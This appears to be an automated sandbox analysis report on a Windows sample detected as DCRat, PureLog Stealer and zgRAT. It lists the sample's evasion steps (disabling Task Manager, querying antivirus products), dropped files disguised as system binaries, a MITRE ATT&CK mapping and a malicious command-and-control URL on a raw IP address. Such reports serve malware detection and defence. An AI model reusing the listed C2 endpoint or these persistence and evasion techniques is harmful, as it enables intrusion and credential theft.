Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Queries volume information: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe VolumeInformation
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00CCDF1E

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CBB146 GetVersionExW,

0_2_00CBB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cef_process.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
Source: Yara match	File source: C:\RuntimeDll\cef_process.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
Source: Yara match	File source: C:\RuntimeDll\cef_process.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cef_process.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
Source: Yara match	File source: C:\RuntimeDll\cef_process.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
Source: Yara match	File source: C:\RuntimeDll\cef_process.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	57 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	271 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	113 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	151 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kBY9lgRaca.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\RuntimeDll\cef_process.exe	100%	Avira	HEUR/AGEN.1323342
C:\RuntimeDll\PBs3ExWWgPs.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\HTmgdJna.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat	100%	Avira	BAT/Delbat.C
C:\RuntimeDll\cef_process.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\MOnylpdT.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\HTmgdJna.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\CNRzgtSC.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CNRzgtSC.log	4%	ReversingLabs
C:\Users\user\Desktop\CfUiBMYm.log	8%	ReversingLabs
C:\Users\user\Desktop\CtGsekUC.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\DJEawqoG.log	17%	ReversingLabs
C:\Users\user\Desktop\DhKAQyQA.log	8%	ReversingLabs
C:\Users\user\Desktop\FelIlyfv.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\GWKYIJYf.log	17%	ReversingLabs
C:\Users\user\Desktop\HOdrnIxw.log	8%	ReversingLabs
C:\Users\user\Desktop\HTmgdJna.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KMBPPFZY.log	8%	ReversingLabs
C:\Users\user\Desktop\MOnylpdT.log	17%	ReversingLabs
C:\Users\user\Desktop\ORagGYiO.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\PqvOIQVP.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\QEeosldM.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\UdNNkMkD.log	9%	ReversingLabs
C:\Users\user\Desktop\UicXeyNX.log	12%	ReversingLabs
C:\Users\user\Desktop\WkOFzhSS.log	21%	ReversingLabs
C:\Users\user\Desktop\WtmFjUlP.log	17%	ReversingLabs
C:\Users\user\Desktop\Yimecftu.log	4%	ReversingLabs
C:\Users\user\Desktop\YmBoVQXN.log	17%	ReversingLabs
C:\Users\user\Desktop\YztwqAnw.log	17%	ReversingLabs
C:\Users\user\Desktop\ZVuWGvdL.log	9%	ReversingLabs
C:\Users\user\Desktop\ZfOmxfIp.log	12%	ReversingLabs
C:\Users\user\Desktop\cmPeMAqD.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\djqniAFy.log	17%	ReversingLabs
C:\Users\user\Desktop\eNXvjbiz.log	4%	ReversingLabs
C:\Users\user\Desktop\hCXTblqe.log	12%	ReversingLabs
C:\Users\user\Desktop\hiNMadse.log	21%	ReversingLabs
C:\Users\user\Desktop\iesEpfvs.log	13%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\iqbcNzlc.log	17%	ReversingLabs
C:\Users\user\Desktop\jBpuMXxn.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\jJYMqGYt.log	8%	ReversingLabs
C:\Users\user\Desktop\jWRUMqoc.log	21%	ReversingLabs
C:\Users\user\Desktop\lYDDhZsX.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\owqLTDnh.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\pPutoWtQ.log	5%	ReversingLabs
C:\Users\user\Desktop\rAZKvkEJ.log	4%	ReversingLabs
C:\Users\user\Desktop\tFkkvTtJ.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\uqHSBmkN.log	21%	ReversingLabs
C:\Users\user\Desktop\vZJioLKA.log	8%	ReversingLabs
C:\Users\user\Desktop\vdXshwoU.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\wjWAnjWL.log	5%	ReversingLabs
C:\Users\user\Desktop\ykSQugis.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\zLeRKKNH.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\zPzZvHLt.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\zlIjJSaG.log	12%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://91.199.45.187/eternalgameSqlflowerDownloads.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microso	powershell.exe, 00000009.00000002.2550202363.0000028365875000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co.	powershell.exe, 0000000E.00000002.2431522493.000001FE69010000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
